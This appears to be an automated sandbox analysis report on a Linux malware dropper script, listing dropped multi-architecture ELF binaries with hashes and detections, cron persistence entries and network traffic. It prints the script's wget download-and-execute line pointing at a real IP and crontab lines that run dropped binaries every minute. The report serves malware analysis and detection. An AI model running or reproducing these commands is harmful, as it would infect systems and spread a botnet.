Preview: .ELF...a...........(...........4.........4. ...(.......................W...W..............:l...l...l.................U................1...1........T.......?.E.h4...kb^....0......W..@...G........."..."7.EfQ.....'....._>....c&.dQ......L.....Q.....p....uGg*.......r.!c..aZ.....|^....6.R.Xq.......?z..|]...p..W#:....f...n0..G^H...l.3P+!;A.l....']'Ve.."~..b.M..E36...X..5`..h.....0[D.I#..t.u..km..'t..*..v..-...J!...........]..2.:..{Z.Q..]*Mv...:M>..aw.;.....?..s.....)5#....e...~Q...g.(........M.T.AK.J..A....A.2..LB'.8.oq.{..n.<.........m.0.g..!....}.a...k.2.Q.[.>..*.M.&..e....z._O...0.c.v......NE^...w.P..ZW....``%OM.........-M#H.E.8i??...T.,y......./....K.n..HtT.....u..b....,..>]..../.. p.....O....#...G.5...#P..,"........@.n1.3...PD....Sz...&,&?.w.vD.*b9V....Ec.eG..7.N9..$..r..Fn....J.&3Si..V..._.@..r.k.....t.=......|.E..l.a.4.77C...X...laE...G'.......#.m..$@..bx.oG.c....[.;....:.....Js.!O..H/..v........U.x{.1.......v..e|...;Z..f.z}....$".[..S.._Y
/run/tty4
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, ARM, version 1 (ARM), too many section (65535)
Category:dropped
Size (bytes):38220
Entropy (8bit):7.970347478718096
Encrypted:false
SSDEEP:768:NHusQyg17D8r8gtpwzxSxnSCwIimJJhg83fc/KjpiLLapU4o3Uo6:gtXhGpExSACwYrg8PcUinwUh6
MD5:A1197F7EE92C9677FF99E25B89BDBEB7
SHA1:AB2C844FD800E3C655E329E48CC0FB656432887B
SHA-256:3ECC12B93649D0B4D1FCFD1DB3481261B731355979F15434BDA79D00C6AAA5D8
SHA-512:E0738A5418D9E93B89041FC1064E44C4C989A128B39FA5736272796B5E29C8BFF9C629EDFEC7DEC4ABAD613356101D37CCD7D62893635A7E8F174247788DDECA
Malicious:true
Antivirus:
  • Antivirus: Metadefender, Detection: 19%, Browse
  • Antivirus: ReversingLabs, Detection: 39%
Reputation:low
Preview: .ELF...a..........(.........4...........4. ...(.....................L...L...........................................E..............{...{.......T..........?.E.h;.}...^..........e.H.......0l..$.CH..ln..&.8{#.ap..@..+%5.L9...w...#P....y..Dc.......P........m...t.O.&.]...'..B..-.%..`_.......N...T.>.w...V.\.:..V.K...FC.R.Yu.6wF.k5N".U..&.F.......l.|.~..QW7.,.H..L...nO...H..X3......s..WD.....&..%?.g.z...2....F.h/..@......$A.z?......Y..DHM%...RkQ_..'O.....t..mno..Y.q..(..7Mv/....<.[.@.6........(..N..0..f.>]B.....b...&....|BT............y...h/..+...5- .....f..,z......2.8f.HA.,.U...y>..Cxvc......:.@F.Hz.,.`......9vo.$.,i....$.u..7..g..L8.p+....5..C..C..Cw...GP.})qi..M.!.....X......V..G..L.TPiJ..)+.3?$..9...S.c..{.t_x...(.'.4.._.C.i..P...$..L..0l....z..".N.....U.*.V>.T3..Cc..pv..|JN....5.......gV...>...rv.....Vq.A`..B........'.S0Y.k.....a*.UCD4..p....U..b..../M...$.z.{.:M..K]..../.u z.p....9E..@..qo...9d(=..).J..7m.&.RB.=e..+.......r:.`...."{....L..z.[#8.}.
/run/tty5
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, ARM, version 1 (ARM), too many section (65535)
Category:dropped
Size (bytes):36716
Entropy (8bit):7.966537348899924
Encrypted:false
SSDEEP:768:ntK5Sa56W1xNSIx0HbdS1U4OS8vxZSlm0ZJSoFnjQ0dht51S1l/v5RMCHIXA2CwD:ntK5LvubdYU4OSCx6mkJSoFnjQ0Pt7gm
MD5:C83C11DBF477C9522DC815DF8A48ADB5
SHA1:1B5AA5EAE755A37FDA9EC6E18EFFC737A6D003C7
SHA-256:91F01D3016D5D353F215822B99BFD7AA10E2D38569B60D139FC609DE54A58830
SHA-512:B119051E4458722832300827CE183B9377A9A94FA255AD7FF15057B517B769CA5E4F692EA21159FC5C76B174493E47F5EC22AB0089E86EFDEB4E89DC0988AB7C
Malicious:true
Antivirus:
  • Antivirus: Metadefender, Detection: 19%, Browse
  • Antivirus: ReversingLabs, Detection: 39%
Reputation:low
Preview: .ELF...a..........(.........4...........4. ...(.....................l...l...........................................E..........................S..........?.E.h;.}...^..........f]..6..M'...r..mB.5r.kq.....c]{$..N...:.......@....r>t...W...{...P........m...t.O.&.]...&....l......xgi.<.Pn92wv.x..m".A....b!.ki....(J...>.Tr.pj....7.;...cy...l^X... .$.._...H$F.Y...9..M.......E.P..6......9d..[... ,{.......)sM*#..4...4{.w....P...T{../;~c&..l.....Q.9.s....^r...'......7)..(..........I..s......KR....x......3.1`r(R%....D. .J......y...+....4r+..t....Z1..@...........-..T.%8.^.&hX....g.x.....f2.m[...X.\..R.. ..R...P,T6..r."....3..JEcF.eb.v+..S.@.V....|.I..7...grE.n1..=.*..L..T..[.v.?.W....=f...C.&~.t...G`..S.M.g.D...[..C..W'...yl|t}G?......-4`0...Z.....Bw.@}.:$.ob6.<...w.2).(.i..{..i..B'q...i.3..o....8d.Tf...F.0.l.4.\J.....&..o..E..@.'......b..Y...G.E..F.Aq..cz(..w.mc(....26\!._P...t.Z.$.R'/..x..DK.$e|'.e.t..K..o....fAd.7.].h..d.HJ...6..(.-h......G.d;...l... ...F.%
/run/tty6
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (GNU/Linux), too many section (65535)
Category:dropped
Size (bytes):43197
Entropy (8bit):7.974617881044813
Encrypted:false
SSDEEP:768:n7Ov3yogNUQnLTUzqis2VYgaHCjwVPiE/TDR9GUkvCJK3UEg6:nqCRyTzqt2CT9WUMg6
MD5:8956B9A4E5194567794F4EE5A8987BB4
SHA1:AA3ACEDF8FD8643B3429FA588D5F3A8E12CD4114
SHA-256:C174C5715D9B281E753819BD477ED50E3C6F4E08707F2871EEED52E39C53DFAB
SHA-512:4C8166E08B411C5BB5AC38AECDFE94437092F3E11B166BDC42224B811FD3894E83FCD6CF35E77382A22E50C88A2192BFDF7E6FF371978E1EEE7BA0EDB3EAB516
Malicious:true
Antivirus:
  • Antivirus: Metadefender, Detection: 14%, Browse
  • Antivirus: ReversingLabs, Detection: 52%
Preview: .ELF..............(.........4...........4. ...(..........................................C..................................,........8...8......_..........?.E.h;...#..$.......p..Q].%.;.....3@.|...B....].F.QN.P........dR.....<......]..V..]0...`........P........m...t.O.&.e....A...D.I..W..$.....[.+........J..^.q...yw}..~..!$..A..(...z#.m.5*...;.HB[U...9..x.\....#j.)%@x.f.&(.I...7...#.r@.h......5..Rm.L.^..Q.8.6....*.3.Z_...s.Xbv...:..G#3h..#.,.vvJ.l.5.cj.ql.h...q[.|.C.{.D7........w....,v6x.s.R...&..T-........Io.x.......q..x(...x."....,R\....k.'Q.W}..%......;.H}c.....y...w.._~"..a.C...9.E]P.5.....d.<..A.W.g...<D..}x-..*06..@.LG.....Y$...G;..[.....xO..;........0....4..[..K...>b.g..$Mt$Z.1.<e..T.o0d...Q.....k.zb.}.l...<.R\......P..<..6..+).....%E..xm.])6*...'#i...l.V.......7.'..'..K.6...-w.u.i.......d)..+o..,n8+.E.d5../F..+&8...AXm,.,.9...k....Q..\..p#...I.N...a>y0..{./\.|.'e.rr.~"*.[..._....pX.:..m.#....".0Q...83m.!.fM}.M...ag....Y...].{-.NJ[_E.{
/tmp/irq0
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), too many section (65535)
Category:dropped
Size (bytes):619271
Entropy (8bit):7.9995110352365435
Encrypted:true
SSDEEP:12288:49p8z4Hq64mzD2XX/TAseoV9qHob07+GaP7DBQKlE3W52NDS/:49pbH/zMAsevoHGkCKlE3qADS/
MD5:31E5586209A2B04E51B2814ECA457B11
SHA1:FA937B5606C82D7F9CE296CBFE04501F8861010C
SHA-256:F930051539DDE6DDFDA5AA9BDB488FB2D022F81294B4D38B64792F19EFF422CB
SHA-512:99BC2499D401BECC7695DEB5094D463B163D4A21B06AFE1515CBD36E12856BB768A12D3CC378EE9941E01BD7475CFB746BE83B3BEB1674880CA5E479D725BA9B
Malicious:true
Preview: .ELF..............(.....$a!.4...........4. ...(.........................<............................s...s..........Q.td..............................!.............l...l.......r..........?.E.h;...#..$........8.4....5.|M..p.../.o. .B..0..[p...G.n%.}..H.K~....W.gpyb..$45....[.....J.W.CD'C.MT............P........f.....H.+.......r..Ap..=gn.h?c).q......b..W.Y.@B.q|".}....p....8....="WF.........b..&....5v(d...T.9..S(<{...B...+....p...x.}..78G..3.Na,u./.....o.p...3O:............H......L.G........G+.f.j.R.."..X~....8.{...n..n.+..{>...=mH...y....d....:.:....9...L....!..^.no...S..P...Zd=.#.d..9......$].....z..D.....}........']1%.*....{0.qhA.>.|.@>{6..zZ*.q.......Mt]..t<0.d.....'..e` o..Z.p.5....V[...l........W..BAN.E....7mJ=\..... .;F^...O?.......wb%..I........g.......1....>0_....L..K0NaN..'.G,vg.t_"...H#....].J....g...-..].V...n.y...u.G.e......*....F,#...Yx..l.%..8...8..K...f.{.w.^.;1^[.+.Pj.Z....^.a.~...h.,(..mC^;>.,.D..3r..5...a|.7%......_;..........>(.{j
/tmp/irq1
Process:/usr/bin/wget
File Type:ELF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), too many section (65535)
Category:dropped
Size (bytes):522420
Entropy (8bit):7.999028674117709
Encrypted:true
SSDEEP:12288:ereZPmU0uF392mWw1nzL55BXJ2sZN8VGBlq/:eSPPJNF52sZN8Vo+
MD5:8331ED689592F620CC9F23BB21848527
SHA1:109BF73D6266BF4E37E3889685205DE51B8426BB
SHA-256:7C107F9345D92C76EBB5DBA5A647668E1FCDE077339550C1DC8255EB199F90D8
SHA-512:EA1904EA6E42D1FAFA3683F4687E9E4FF7FC999120ACDAAD9C567FF24909625BB2D7BDB46AB87338F502C206B17EC4096C7D557E0E07387030AF7D7AB19FEB74
Malicious:true
Preview: .ELF....................._. ...4....P....4. ...(.............@...@........x..................X...X..................B.................(...(........l.......?.E.h4....K.:.b.....~..7"..q......kGh..j2.!..d1.!..iT..<...3.`&..P..,..9..=.....c..3.,.69..g./.)i...q...D...)........i.Z........?.-....T.8\.8.....P.D.p.df.......\^3.}@..>...6.O.h.V..Y._>.o.. ..N..$..?..fdUY..8.....aiFTF=O...>Tm....D.U)...[....8< R..^..`42....>.<p....0K7-......&.He..Q(...-}.[....l....pb....bZ....h......3.3..+.-ZLoF....qd.;.z_<?!.k.6....5=.._.A(...\.zH...D8......mXP.....j...`.f....\R.v.2D....#h..T.e.%....YivD...G..X.9.d.R.....`_..Z..)2u...3u..#..e.2..n.....6....){..W(hH..6...YaI.......i.E2...r\.:|......Tk.K.m.....d0Or.?.l~.[W...?......`..{no..U..5.\.Q.h.....$..............?`A....|1.......Q7.......H.?..D.KssZGn.......W..N$."......."Qd.1.]...........t.h9....P>.^...............QC.CX-........4bB#. .~b..p..Z._.c...w.H..X..A.k..,....])..Q@ew..n(.YV/...i.../.....Q...t.>.r$.+.i
/tmp/irq2
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), too many section (65535)
Category:dropped
Size (bytes):526649
Entropy (8bit):7.998928505268478
Encrypted:true
SSDEEP:12288:6Nf7sPRGbJuRta8GJFZMdBsU7r2EnNSHvlbO69dmg7rW:6N1JuRtalJFCnPGbOrg7K
MD5:3896C56ACEC65BD7F893605C1BD8CD8D
SHA1:0404D9D7EC827719BC89618BCD9FCD073D582484
SHA-256:5E63F7A44502B4675E18E75F94D5FDDFC31885A363AB0E89064A262AA5EFF31A
SHA-512:61A6DBF6D6EB54A5E8A46E4AD950AEDCA73C2D5D0C6FF77C28DC6930CC7656620592960FE8FCE1AA42BACF1D0B7EC5711281E8DCB10DD2C6D63E551BA15F2004
Malicious:false
Preview: .ELF......................_.4..........P4. ...(...............@...@......p....................X...X.9...9..............{............. ... ......k..........?.E.h;.....i>..l...4X=.cg...^..#.....|.o..fOkO......Y....m"..x.?...1@.0.{.K......uwE.$.b."".*.5...D...............i.Z.....N.~...]O.9w..p6.*....);.XA.;|._!...X.Js]Z... ..c...s;^X:h*i+.w.Xob.......b......=..k..FT.2.r8.%.....p....h.....F..%...I..w9S..4.....l.kq.........5V.4....q2i^j?..N.!..1^]u. .'9...}..u.0.]c..Rj.x.(....6.9......FG..I.adf.n(k.}.!...+A..U.S.4.Wk.........b.^6$...^..d.8. R...._$..I.B..)../.j...:<4.[...._w..eqV.j.C....s.P...#.z!.gA.t.).!/hx.J..r[u...\.>...}.y.9};V}.... ..v.V.lf. .....4H.P.,Q:..^.....V<IMyb....YL.e...."\.\..^+.k..U...S..+....O+.i...v.+.F.].&.#.....S.A.._k..c.l.d..m.+.R.n.s...E.....y....xxq..<..Q)]..D1...6Z....}B.t.{...Q<@..........T.W-.>(Y$.8.b.H_-c.....w.._....}.%.<...s..r..#.zEk......p..f.b.$..$F..+F.G.-Br..A.s..U...n4,.f.C...........u...~%.M*jE.{9[....y
/tmp/pty
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Category:dropped
Size (bytes):44700
Entropy (8bit):7.96979909460751
Encrypted:false
SSDEEP:768:1nw1BeZO43SjZ/KtfzuQcno4J26pZWzwRs8aO1pOseoanbcuyD7UYcfYeFMnyxHc:ScO4Sytfzu5noNyWkRs83t4nouy8Ycfy
MD5:05E1C4A7333BFBD41D109FFC2F70A52A
SHA1:D1DAA9D15EC8DE1C92D8D83F3E6AB3035EE3FA9C
SHA-256:862251C20985485D58333FBE31792E09C4CEDE7E157BD39D78EA4BA60756C99F
SHA-512:7D614E11F2D31EE608395260619E0F66A8DC5CCEC2C3C560E8A5E55B7D61F88AEBC226FFB03184218995EDD985B56C926D48D381B97BDC5DCC5B0E2BF9D46C5C
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Preview: .ELF....................h...4...........4. ...(.....................................................................CW....t......._..._.......U..........?..k.I/.j....\.h.blz.e..4.5....DM.h.F/...!..!.!..Y^..."" ?#KX.D...2.8...q....<...~...I.....*.m\'..._..R@...... ...q...gv......xO...x&..PD...X..[....?B @Y/W...T... .7.H..M.P8.=..H:..4.*.A...R.......>....N"g~\.c.*.......A..O....U.D.._..[...AFM}.n`0..a....^.....cu>.7~.}~o..V.......3HW@.6D[V_.z;j.2o...".mk..K...*...l...!.f........]. W;..d.N...6-..u....u.......D8...L.JW`6.q...w..................z...-X$....k/BgH.\....l.2?Je......<..U..Y.>...M.d...q.C_.........`k.%.... .[..|Z.f...t.......U.cg[..1.x......w..".c....F...5...]A.w..t..?..K. ........@....'..X.;Td.@.mf...D8iC..i..=.U...|.(.K9.z\...0..&....[W.69..Y.......M.7.5b..aR.$...t*.._k{...R._..f.B...i.............xc}.*u.`n.....a.G..>>7-_..64........P...Rw......,Rm...B..|....DnV...<.vr.I.A.q1._.g....\...r..ER]0........AHt.(7J.,.[...YK..p(c.\...C.?q...&.
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
Process:/usr/share/apport/apport-checkreports
File Type:ASCII text
Category:dropped
Size (bytes):14916
Entropy (8bit):4.713435851791589
Encrypted:false
SSDEEP:192:7/mAf9mm8khJO3wPl6u9sU0Ex9yuPI5hbM:7uAf9HP0ER5
MD5:60B81177D553432BB11B8B6BD0E962A0
SHA1:C6D5ABFBF2BE2F1F8CF065B2184209ED2676DE01
SHA-256:7BE494C43CDF13F1F21107CA40EF86A7CCC5CAB0C84624358EBA682DAADEA824
SHA-512:26A2B6B581F6CF89DFBFC4B12078442D34CEE9CA2811632443D38CA88028C01B9B158D04F00288A335A1826D9F0E6C7C68968A4709A032A0E6CDA03DB1E51C26
Malicious:false
Preview: ProblemType: Crash.Date: Thu Mar 25 06:30:16 2021.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01647000-0199f000 rw-p 00000000 00:00 0 [heap]. 7f9ce2ad5000-7f9ce2c56000 rw-p 00000000 00:00 0 . 7f9ce2c56000-7f9ce2c6d000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f9ce2c6d000-7f9ce2e6c000 ---p 00017000 fc:0
/var/crash/_usr_share_apport_apport-gtk.1000.crash
Process:/usr/share/apport/apport-gtk
File Type:ASCII text
Category:dropped
Size (bytes):47094
Entropy (8bit):4.500633084235313
Encrypted:false
SSDEEP:768:t/N/1/f/Ll9vYVZMQGZkqxkM0z11cddCA:t/N/1/f/8GZWM0z11cddCA
MD5:9331499BBBFB451C02B360672503743A
SHA1:C04EDD8025582BBBE7BF34FF74625F2BC08BB209
SHA-256:F10702E21739BDCA5E32FE1573898FFE2F632B409EC50794BF0DD3C8E76A1140
SHA-512:C6B3D8E67A8E6C5A5F750BCA9246B4EECA77C5B530F9793FFFCAFACB46D44F9FF4B956A3D5B469293694D724AF993F1DB1F5802FDB19473BDE11008594A7EB0A
Malicious:false
Preview: ProblemType: Crash.Date: Thu Mar 25 06:30:16 2021.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 00ac9000-00fea000 rw-p 00000000 00:00 0 [heap]. 7ff718bd4000-7ff718cd4000 rw-p 00000000 00:00 0 . 7ff718cd4000-7ff718ceb000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7ff718ceb000-7ff718eea000 ---p 00017000 fc:00 2382
/var/spool/cron/crontabs/tmp.NIHyLb
Process:/usr/bin/crontab
File Type:ASCII text
Category:dropped
Size (bytes):235
Entropy (8bit):5.181913176653161
Encrypted:false
SSDEEP:6:SUrpqoqQjEOP1K+1xmOazVOBFQLM9ZjMGMQ5UYLtCFt39YBhFz:8QjDaz88neHLU9YV
MD5:0E47420FBE30AB1A41CE4BB87E1AC6FC
SHA1:1A7A6C82964DD24284A2EC0510F622DEBD8B7417
SHA-256:EDF628BF6314054FF205EDBB1A33DAB7A224E99890627AF1A6509C5EF0071482
SHA-512:398E42E6593FE04A1C98F6AF7C6EA8581130B05C8282AD09206EE20CA025D75EB21237BA76F856DBC7BBBC9BDD45E389E37667FF748B132440A563049FD86569
Malicious:true
Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (/var/run/.x001804289383 installed on Thu Mar 25 06:27:12 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty > /dev/null 2>&1 &.
/var/spool/cron/crontabs/tmp.U4426K
Process:/usr/bin/crontab
File Type:ASCII text
Category:dropped
Size (bytes):312
Entropy (8bit):5.071249922801944
Encrypted:false
SSDEEP:6:SUrpqoqQjEOP1K+1xuwYJOBFQLM9Z1MGMQ5UYLtCFt39YBhF5qBTvw5F5qBTVFz:8QjAwl8yqeHLU9YfqFoqFL
MD5:CADCAE57C9CA1F60D5ACD8107D5272FB
SHA1:5143C08CE798102DEAAB52DA0B156A49BEF83880
SHA-256:96C890CE78C9E2BC82CE02230716E2B6C982B68395BBA4797F74060AA0165457
SHA-512:ADACC8205060B0288B8BD07ECBF4DD6D0D5F42B0445194D250599597768EA9FD8FED39E59CFF9F8790240C6CDBAF835EC7DB30EBF10FB8929CFD40A6818DFD89
Malicious:true
Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (/var/run/.x00740882966 installed on Thu Mar 25 06:27:18 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty > /dev/null 2>&1 &.* * * * * /tmp/irq0 > /dev/null 2>&1 &.* * * * * /tmp/irq1 > /dev/null 2>&1 &.
/var/spool/cron/crontabs/tmp.eaL8KX
Process:/usr/bin/crontab
File Type:ASCII text
Category:dropped
Size (bytes):273
Entropy (8bit):5.141823475282832
Encrypted:false
SSDEEP:6:SUrpqoqQjEOP1K+1xuwYJOBFQLM9Zg/GMQ5UYLtCFt39YBhF5qBTvw5Fz:8QjAwl8NeHLU9YfqFG
MD5:7E78F2B54165AE45B444504A06616EE7
SHA1:5C63259FF55B133B9E13DD252DDBCA4BEB43FCE8
SHA-256:FFB03BBEFBF33E702EBB6CB2B06225A1577CF4220C30D7D89CB93AB7CD50E1EE
SHA-512:79F2FC4F64062086DFAD6570DA34AAFDA09A1EA25977876297247627D61CC47658586F4100B6131AA4E44B7ACCAE3FB12760BF35135077D296EDF89ABBFC052D
Malicious:true
Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (/var/run/.x00740882966 installed on Thu Mar 25 06:27:14 2021).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).* * * * * /tmp/pty > /dev/null 2>&1 &.* * * * * /tmp/irq0 > /dev/null 2>&1 &.
/var/tmp/pty
Process:/usr/bin/wget
File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
Category:dropped
Size (bytes):44700
Entropy (8bit):7.96979909460751
Encrypted:false
SSDEEP:768:1nw1BeZO43SjZ/KtfzuQcno4J26pZWzwRs8aO1pOseoanbcuyD7UYcfYeFMnyxHc:ScO4Sytfzu5noNyWkRs83t4nouy8Ycfy
MD5:05E1C4A7333BFBD41D109FFC2F70A52A
SHA1:D1DAA9D15EC8DE1C92D8D83F3E6AB3035EE3FA9C
SHA-256:862251C20985485D58333FBE31792E09C4CEDE7E157BD39D78EA4BA60756C99F
SHA-512:7D614E11F2D31EE608395260619E0F66A8DC5CCEC2C3C560E8A5E55B7D61F88AEBC226FFB03184218995EDD985B56C926D48D381B97BDC5DCC5B0E2BF9D46C5C
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Preview: .ELF....................h...4...........4. ...(.....................................................................CW....t......._..._.......U..........?..k.I/.j....\.h.blz.e..4.5....DM.h.F/...!..!.!..Y^..."" ?#KX.D...2.8...q....<...~...I.....*.m\'..._..R@...... ...q...gv......xO...x&..PD...X..[....?B @Y/W...T... .7.H..M.P8.=..H:..4.*.A...R.......>....N"g~\.c.*.......A..O....U.D.._..[...AFM}.n`0..a....^.....cu>.7~.}~o..V.......3HW@.6D[V_.z;j.2o...".mk..K...*...l...!.f........]. W;..d.N...6-..u....u.......D8...L.JW`6.q...w..................z...-X$....k/BgH.\....l.2?Je......<..U..Y.>...M.d...q.C_.........`k.%.... .[..|Z.f...t.......U.cg[..1.x......w..".c....F...5...]A.w..t..?..K. ........@....'..X.;Td.@.mf...D8iC..i..=.U...|.(.K9.z\...0..&....[W.69..Y.......M.7.5b..aR.$...t*.._k{...R._..f.B...i.............xc}.*u.`n.....a.G..>>7-_..64........P...Rw......,Rm...B..|....DnV...<.vr.I.A.q1._.g....\...r..ER]0........AHt.(7J.,.[...YK..p(c.\...C.?q...&.

Static File Info

General

File type:ASCII text
Entropy (8bit):4.72766401426966
TrID:
    File name:1.sh
    File size:1434
    MD5:65fc26f78151a04e71dd86ca38cf4fd2
    SHA1:3adf311b9e97dac5ccd95cf9c992c17e5c3ffabd
    SHA256:864d438887ea34ffd06b03695267e93b48e73ec0f39d047968a1cce44448c581
    SHA512:4d04ed26a5878a562c377347c534e889fc2af96d8a2f4321fdcbd315fea7750a3fdb183576a6d59bbf9b2a996ab6f4e2bbfa2d9c859b4cf248c1274c85f5c41d
    SSDEEP:12:ekDoZoxpfmelkVIfbp2myZ8lkZ8DZ8Dxp8EmYlkAFFpkmFlkn66pTmSlkWtz3pSx:emUTENDeD4kFS6e03uHCJ5e5A/ee
    File Content Preview:wget http://71.127.148.69/.x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 700 /var/run/tty0 ; /var/run/tty0 &.wget http://71.127.148.69/.x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 700 /var/run/tty1 ; /var/run/tty1 &.wget http://71.

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Mar 25, 2021 05:27:06.882802010 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.005290985 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.005546093 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.006999969 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.130522966 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.130584002 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.130614996 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.130645990 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.130728960 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.130780935 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.133986950 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.134037018 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.254297972 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.254367113 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.254513025 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.255990982 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.255997896 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.256052017 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.256102085 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.256145954 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.256330967 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.256370068 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.256382942 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.256388903 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.376655102 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.376828909 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.376893997 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.377424002 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379105091 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379163980 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379204988 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379245043 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379286051 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379324913 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379374981 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379419088 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379458904 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379492998 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379498005 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.379523993 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379534006 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379542112 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379549026 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379555941 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379575968 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379592896 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379601955 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.379607916 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.499991894 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.500055075 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.500085115 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.500116110 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.500197887 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.500250101 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.501660109 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.501770020 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.501821041 CET3948680192.168.2.2071.127.148.69
